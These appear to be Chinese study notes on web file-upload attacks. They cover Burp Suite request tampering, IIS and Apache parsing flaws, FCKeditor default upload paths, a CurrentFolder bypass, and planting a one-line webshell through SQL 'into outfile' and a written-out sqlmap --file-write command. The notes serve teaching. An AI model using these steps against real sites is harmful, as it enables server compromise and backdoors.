WEB安全——文件上传

通过burpsuite抓包上传webshell

先上传正常图片；

通过抓包获得上传页面的url以及cookie；

通过明小子的综合上传功能上传webshell；

 

IIS解析漏洞：

1.如果一个目录以“xxx.asp”的形式命名，那么该目录下的所有类型的文件都会被当作asp文件来进行解析；

2.如果一个文件的扩展名采用“.asp;*.jpg"的形式，那么该文件也会被当作asp文件解析执行；

一般在IIS6.0才存在，一个没有补丁的漏洞；

apache解析漏洞：

在解析文件时，当碰到不认识的扩展名时，将会从后往前解析，知道碰到认识的扩展名；

如，teset.php.xx

在apache1.1和1.2存在，nginx也存在该漏洞；

 

编辑器漏洞：FCKeditor（Ewebeditor）

通过搜索引擎等方式获知网站是否使用FCKeditor；

获取或猜测FCKeditor的安装目录；

利用IIS6解析漏洞上传一句话木马或webshell；

 

FCKeditor敏感信息：

查看版本信息：

/FCKEditor/editor/dialog/fck_about.html

/FCKeditor/_whatsnew.html

默认上传页面：

/FCKEditor/editor/filemanager/browser/default/browser.html

/FCKEditor/editor/filemanager/browser/default/connectors/test.html

/FCKEditor/editor/filemanager/browser/upload/test.html

/FCKEditor/editor/filemanager/browser/connectors/test.html

/FCKEditor/editor/filemanager/browser/connectors/uploadtest.html

 

利用文件夹名解析漏洞尝试绕过：

正常创建文件夹1.asp，也被替换为1_asp

修改父目录的名字，在burpsuite中，将CurrentFolder=%2F修改为CurrentFolder=%2F1.asp

%2F使用ASCII码形式表示字符“/”

 

通过SQL语句注入实现文件上传

手工注入：

select “test1" into outfile "D:/AppServe/www/test1.txt"

select * from hack union select 1, "一句话木马", 3 into outfile "D:/AppServe/www/test1.txt"

sqlmap注入：

先将一句话木马存放到本地文件d:\ma.php中

获取到目标网站的物理路径C:\NPMserv\www

--file-write参数指定本地文件路径

--file-dest参数指定目标路径

sqlmap.py -u "http://192.168.77.122/info_show.php?info_id=140"--file-write “d:/ma.php” --file-dest “C:/NPMserv/www/ma.php”

前提：

数据库是MySQL或MSSQL

当前用户必须具有数据库管理员权限

知道目标网站的物理路径